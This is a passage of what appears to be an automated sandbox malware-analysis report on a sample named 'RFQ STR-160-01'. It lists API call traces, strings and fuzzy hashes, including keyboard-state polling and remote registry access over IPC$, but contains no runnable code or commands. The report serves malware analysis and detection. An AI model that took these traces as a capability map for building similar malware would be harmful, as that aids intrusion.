              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
              • String ID: RegDeleteKeyExW$advapi32.dll
              • API String ID: 2734957052-4033151799
              • Opcode ID: ec1684d7cba7f245f9a78fc6228634b264b18dd2fbe95ba153ae1761a05066ed
              • Instruction ID: 6ec19cc07b534e8c79ea806bf6d9c526b091c3eaf9f4fcd3567af37d275a1952
              • Opcode Fuzzy Hash: ec1684d7cba7f245f9a78fc6228634b264b18dd2fbe95ba153ae1761a05066ed
              • Instruction Fuzzy Hash: 87318C71941129BBDB308B55EC88EFFBB7EEF45760F040165A906E2240DA709E86DAE0
              APIs
              • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00603D40
              • _wcslen.LIBCMT ref: 00603D6D
              • CreateDirectoryW.KERNEL32(?,00000000), ref: 00603D9D
              • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00603DBE
              • RemoveDirectoryW.KERNEL32(?), ref: 00603DCE
              • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00603E55
              • CloseHandle.KERNEL32(00000000), ref: 00603E60
              • CloseHandle.KERNEL32(00000000), ref: 00603E6B
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
              • String ID: :$\$\??\%s
              • API String ID: 1149970189-3457252023
              • Opcode ID: e4b529ba84a2330d705923fb358747edbd4c27206080960b3887de55cec51ce2
              • Instruction ID: 3f831cb79136e8e6dac61e3ed359892768fae7daf0c35f5a883a4f594cd5bf2e
              • Opcode Fuzzy Hash: e4b529ba84a2330d705923fb358747edbd4c27206080960b3887de55cec51ce2
              • Instruction Fuzzy Hash: 5531A17195021AABDB219FA0DC49FEF37BEEF88711F1041A6F505D62A0EB7097458B24
              APIs
              • timeGetTime.WINMM ref: 005FE6B4
                • Part of subcall function 005AE551: timeGetTime.WINMM(?,?,005FE6D4), ref: 005AE555
              • Sleep.KERNEL32(0000000A), ref: 005FE6E1
              • EnumThreadWindows.USER32(?,Function_0006E665,00000000), ref: 005FE705
              • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 005FE727
              • SetActiveWindow.USER32 ref: 005FE746
              • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 005FE754
              • SendMessageW.USER32(00000010,00000000,00000000), ref: 005FE773
              • Sleep.KERNEL32(000000FA), ref: 005FE77E
              • IsWindow.USER32 ref: 005FE78A
              • EndDialog.USER32(00000000), ref: 005FE79B
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
              • String ID: BUTTON
              • API String ID: 1194449130-3405671355
              • Opcode ID: 1eed6e05fcac29509e65faf3017dd1c581b1dd2d23199d4062c5c5a369c85915
              • Instruction ID: 25cb254a78e261f4751b9ac73de8195d2d905f2303743174e123e6d958f12e76
              • Opcode Fuzzy Hash: 1eed6e05fcac29509e65faf3017dd1c581b1dd2d23199d4062c5c5a369c85915
              • Instruction Fuzzy Hash: A521F670200A4AAFFB106F24EC9FA393F6BF755758F002425F602D11B1DBB59C519B20
              APIs
                • Part of subcall function 00599CB3: _wcslen.LIBCMT ref: 00599CBD
              • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 005FEA5D
              • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 005FEA73
              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 005FEA84
              • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 005FEA96
              • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 005FEAA7
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: SendString$_wcslen
              • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
              • API String ID: 2420728520-1007645807
              • Opcode ID: 2da9a08bab6c240941a51289f3748adbac1216831238bc853f98fd6f5162abb8
              • Instruction ID: b9eed99eb5fcbe691b6dd2672a763399319ca111c4e1f9579d3b8cb775dae32f
              • Opcode Fuzzy Hash: 2da9a08bab6c240941a51289f3748adbac1216831238bc853f98fd6f5162abb8
              • Instruction Fuzzy Hash: A2114F61A9021AB9DB20A7A5DC4EDFF6E7DFBD1F41F4105297951A20E1EAB00D09C5B0
              APIs
              • GetDlgItem.USER32(?,00000001), ref: 005F5CE2
              • GetWindowRect.USER32(00000000,?), ref: 005F5CFB
              • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 005F5D59
              • GetDlgItem.USER32(?,00000002), ref: 005F5D69
              • GetWindowRect.USER32(00000000,?), ref: 005F5D7B
              • MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 005F5DCF
              • GetDlgItem.USER32(?,000003E9), ref: 005F5DDD
              • GetWindowRect.USER32(00000000,?), ref: 005F5DEF
              • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 005F5E31
              • GetDlgItem.USER32(?,000003EA), ref: 005F5E44
              • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 005F5E5A
              • InvalidateRect.USER32(?,00000000,00000001), ref: 005F5E67
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: Window$ItemMoveRect$Invalidate
              • String ID:
              • API String ID: 3096461208-0
              • Opcode ID: cea8916ddf5f8945ba8304aa1fd9b4bcadd318598f1e22506b20b5238c6f37df
              • Instruction ID: 152a5111aaff699b8093643be8638991c2e82ef47d0a1fc134105182ea99c167
              • Opcode Fuzzy Hash: cea8916ddf5f8945ba8304aa1fd9b4bcadd318598f1e22506b20b5238c6f37df
              • Instruction Fuzzy Hash: 2D512F70A00619AFDB18CF68CD99AAE7BBAFB48310F148129F615E7690E7749E05CB50
              APIs
                • Part of subcall function 005A8F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,005A8BE8,?,00000000,?,?,?,?,005A8BBA,00000000,?), ref: 005A8FC5
              • DestroyWindow.USER32(?), ref: 005A8C81
              • KillTimer.USER32(00000000,?,?,?,?,005A8BBA,00000000,?), ref: 005A8D1B
              • DestroyAcceleratorTable.USER32(00000000), ref: 005E6973
              • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,005A8BBA,00000000,?), ref: 005E69A1
              • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,005A8BBA,00000000,?), ref: 005E69B8
              • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,005A8BBA,00000000), ref: 005E69D4
              • DeleteObject.GDI32(00000000), ref: 005E69E6
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
              • String ID:
              • API String ID: 641708696-0
              • Opcode ID: 3506c2f96a976fef173fbc767caeebb7dcaf0237277db33bffa419d025eaa4f7
              • Instruction ID: fc191133e779ec3a9eaf4a55cb2c321f0753a71dffb097d06c96f86751412025
              • Opcode Fuzzy Hash: 3506c2f96a976fef173fbc767caeebb7dcaf0237277db33bffa419d025eaa4f7
              • Instruction Fuzzy Hash: A4619C30502A41DFCB399F15D968B3D7FF2FB523A2F185928E0829A560CB71AD91CF90
              APIs
                • Part of subcall function 005A9944: GetWindowLongW.USER32(?,000000EB), ref: 005A9952
              • GetSysColor.USER32(0000000F), ref: 005A9862
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: ColorLongWindow
              • String ID:
              • API String ID: 259745315-0
              • Opcode ID: 03183eb76681610d85c35f795ee650d92727e765833faf2255a8be48e726e710
              • Instruction ID: ee81525f3ed84b0f3109649374916e44df8e0d1643ca8c4671c0d10337414849
              • Opcode Fuzzy Hash: 03183eb76681610d85c35f795ee650d92727e765833faf2255a8be48e726e710
              • Instruction Fuzzy Hash: C9419E31104A65AFDB309F389C89BBE3FA6BB07330F144605F9A28B1E1C6399C52DB50
              APIs
              • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,?,?,005DF7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?), ref: 005F9717
              • LoadStringW.USER32(00000000,?,005DF7F8,00000001), ref: 005F9720
                • Part of subcall function 00599CB3: _wcslen.LIBCMT ref: 00599CBD
              • GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,005DF7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?,00000000), ref: 005F9742
              • LoadStringW.USER32(00000000,?,005DF7F8,00000001), ref: 005F9745
              • MessageBoxW.USER32(00000000,00000000,?,00011010), ref: 005F9866
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: HandleLoadModuleString$Message_wcslen
              • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
              • API String ID: 747408836-2268648507
              • Opcode ID: a73aa438e0823c7c0897e79769576c41442a4b3856af67679a675388cec1b160
              • Instruction ID: f349c2da16c6938a6165db1309959630d50822f7d762f5e3c603138ecde153d1
              • Opcode Fuzzy Hash: a73aa438e0823c7c0897e79769576c41442a4b3856af67679a675388cec1b160
              • Instruction Fuzzy Hash: F841407280060AAACF04EBE4DD4AEFE7B79BF95340F504429F60572091EB755F48CB61
              APIs
                • Part of subcall function 00596B57: _wcslen.LIBCMT ref: 00596B6A
              • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 005F07A2
              • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 005F07BE
              • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 005F07DA
              • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 005F0804
              • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 005F082C
              • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 005F0837
              • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 005F083C
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
              • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
              • API String ID: 323675364-22481851
              • Opcode ID: 18875ebe16bf74ed31227001e324c024ab77795c253b8d5802c2bfbf5a908521
              • Instruction ID: 476ad12a9cddbbb0fbcf11c0b2e4544bd539728ccf8befff09d0944d66cf69e1
              • Opcode Fuzzy Hash: 18875ebe16bf74ed31227001e324c024ab77795c253b8d5802c2bfbf5a908521
              • Instruction Fuzzy Hash: 61411672C1022DABDF21EBA4DC99CEDBB79FF44350F144169E901A31A1EB349E04CBA0
              APIs
              • VariantInit.OLEAUT32(?), ref: 00613C5C
              • CoInitialize.OLE32(00000000), ref: 00613C8A
              • CoUninitialize.OLE32 ref: 00613C94
              • _wcslen.LIBCMT ref: 00613D2D
              • GetRunningObjectTable.OLE32(00000000,?), ref: 00613DB1
              • SetErrorMode.KERNEL32(00000001,00000029), ref: 00613ED5
              • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00613F0E
              • CoGetObject.OLE32(?,00000000,0062FB98,?), ref: 00613F2D
              • SetErrorMode.KERNEL32(00000000), ref: 00613F40
              • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00613FC4
              • VariantClear.OLEAUT32(?), ref: 00613FD8
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
              • String ID:
              • API String ID: 429561992-0
              • Opcode ID: 54a80523df534b8145cfa297ae57e1f6c3e1a4f169f6bd570cc29b3ca1d1cc38
              • Instruction ID: 5d9acf5007d4b5721e38abbc17717a2f0abfb28d1ce03fe36af20e4310ef067b
              • Opcode Fuzzy Hash: 54a80523df534b8145cfa297ae57e1f6c3e1a4f169f6bd570cc29b3ca1d1cc38
              • Instruction Fuzzy Hash: 0DC123716083159FD700DF68C8849AABBEABF89744F04491DF98A9B350DB30ED46CB52
              APIs
              • CoInitialize.OLE32(00000000), ref: 00607AF3
              • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00607B8F
              • SHGetDesktopFolder.SHELL32(?), ref: 00607BA3
              • CoCreateInstance.OLE32(0062FD08,00000000,00000001,00656E6C,?), ref: 00607BEF
              • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00607C74
              • CoTaskMemFree.OLE32(?,?), ref: 00607CCC
              • SHBrowseForFolderW.SHELL32(?), ref: 00607D57
              • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00607D7A
              • CoTaskMemFree.OLE32(00000000), ref: 00607D81
              • CoTaskMemFree.OLE32(00000000), ref: 00607DD6
              • CoUninitialize.OLE32 ref: 00607DDC
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
              • String ID:
              • API String ID: 2762341140-0
              • Opcode ID: 39a98ba9de4dcfd7d35f1cf7e5ccdb18ecb9d7d4e34807154ab12036df807397
              • Instruction ID: d9e4b3a8dc790798173ee3d661add477f85fd82766e0284d65f8df8f3d4cb6e0
              • Opcode Fuzzy Hash: 39a98ba9de4dcfd7d35f1cf7e5ccdb18ecb9d7d4e34807154ab12036df807397
              • Instruction Fuzzy Hash: EBC11C75A04509AFDB14DF64C888DAEBBFAFF48314B148499E815DB3A1D730EE45CB90
              APIs
              • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00625504
              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00625515
              • CharNextW.USER32(00000158), ref: 00625544
              • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00625585
              • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 0062559B
              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 006255AC
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: MessageSend$CharNext
              • String ID:
              • API String ID: 1350042424-0
              • Opcode ID: 776d9bf2acf09e1d153ec17e87212b478647b95e757dcb9554d173d1cd088fe9
              • Instruction ID: 767e8bfaa408f75aa9d4cbfc7d5d506954285e00eedd6ae81945e0bbde7fc91f
              • Opcode Fuzzy Hash: 776d9bf2acf09e1d153ec17e87212b478647b95e757dcb9554d173d1cd088fe9
              • Instruction Fuzzy Hash: 57617E30900A29EBDF309F54EC859FE7BBAEF05760F108145F926AB290D7748A81DF61
              APIs
              • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 005EFAAF
              • SafeArrayAllocData.OLEAUT32(?), ref: 005EFB08
              • VariantInit.OLEAUT32(?), ref: 005EFB1A
              • SafeArrayAccessData.OLEAUT32(?,?), ref: 005EFB3A
              • VariantCopy.OLEAUT32(?,?), ref: 005EFB8D
              • SafeArrayUnaccessData.OLEAUT32(?), ref: 005EFBA1
              • VariantClear.OLEAUT32(?), ref: 005EFBB6
              • SafeArrayDestroyData.OLEAUT32(?), ref: 005EFBC3
              • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 005EFBCC
              • VariantClear.OLEAUT32(?), ref: 005EFBDE
              • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 005EFBE9
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
              • String ID:
              • API String ID: 2706829360-0
              • Opcode ID: d5edd545e0ee8d9124ed38699aaa67aa2e6c8a699a62adf0017f990cc2826676
              • Instruction ID: 19939ba0e0d8bb64f3e80e84d038123c9d2aea0689a1f56a9f6a25838434243f
              • Opcode Fuzzy Hash: d5edd545e0ee8d9124ed38699aaa67aa2e6c8a699a62adf0017f990cc2826676
              • Instruction Fuzzy Hash: E7414035A002199FCF14EF65CC58DAEBFB9FF48354F108069E945AB261DB30A946CFA0
              APIs
              • GetKeyboardState.USER32(?), ref: 005F9CA1
              • GetAsyncKeyState.USER32(000000A0), ref: 005F9D22
              • GetKeyState.USER32(000000A0), ref: 005F9D3D
              • GetAsyncKeyState.USER32(000000A1), ref: 005F9D57
              • GetKeyState.USER32(000000A1), ref: 005F9D6C
              • GetAsyncKeyState.USER32(00000011), ref: 005F9D84
              • GetKeyState.USER32(00000011), ref: 005F9D96
              • GetAsyncKeyState.USER32(00000012), ref: 005F9DAE
              • GetKeyState.USER32(00000012), ref: 005F9DC0
              • GetAsyncKeyState.USER32(0000005B), ref: 005F9DD8
              • GetKeyState.USER32(0000005B), ref: 005F9DEA
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: State$Async$Keyboard
              • String ID:
              • API String ID: 541375521-0
              • Opcode ID: 906cac1131714dce18f06e9295b29959323d269192b932fd4fb501ae1e7a3759
              • Instruction ID: 87ec29ebe42face093b9ac5005effe7cd79b9d5fb28ead4b72aa05ff6d93a655
              • Opcode Fuzzy Hash: 906cac1131714dce18f06e9295b29959323d269192b932fd4fb501ae1e7a3759
              • Instruction Fuzzy Hash: B141A434504FCD6EFF31966488043B5BEA17B12344F18805ADBC6975C2DBA99DC8C7A2
              APIs
              • WSAStartup.WSOCK32(00000101,?), ref: 006105BC
              • inet_addr.WSOCK32(?), ref: 0061061C
              • gethostbyname.WSOCK32(?), ref: 00610628
              • IcmpCreateFile.IPHLPAPI ref: 00610636
              • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 006106C6
              • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 006106E5
              • IcmpCloseHandle.IPHLPAPI(?), ref: 006107B9
              • WSACleanup.WSOCK32 ref: 006107BF
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
              • String ID: Ping
              • API String ID: 1028309954-2246546115
              • Opcode ID: 3768b89bc1c5501141f222d03df2d40f907a8bb3bdb6ebf5c4b381fd0717ef8b
              • Instruction ID: ba3392af5ad6bdfec32b18f6cfc839dedacd7fb89ac021f9d35c54c50dc7c93e
              • Opcode Fuzzy Hash: 3768b89bc1c5501141f222d03df2d40f907a8bb3bdb6ebf5c4b381fd0717ef8b
              • Instruction Fuzzy Hash: 97916E355042019FEB20DF15C589B9ABBE2BF84318F1885A9E4698B7A2C770EDC5CF91
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
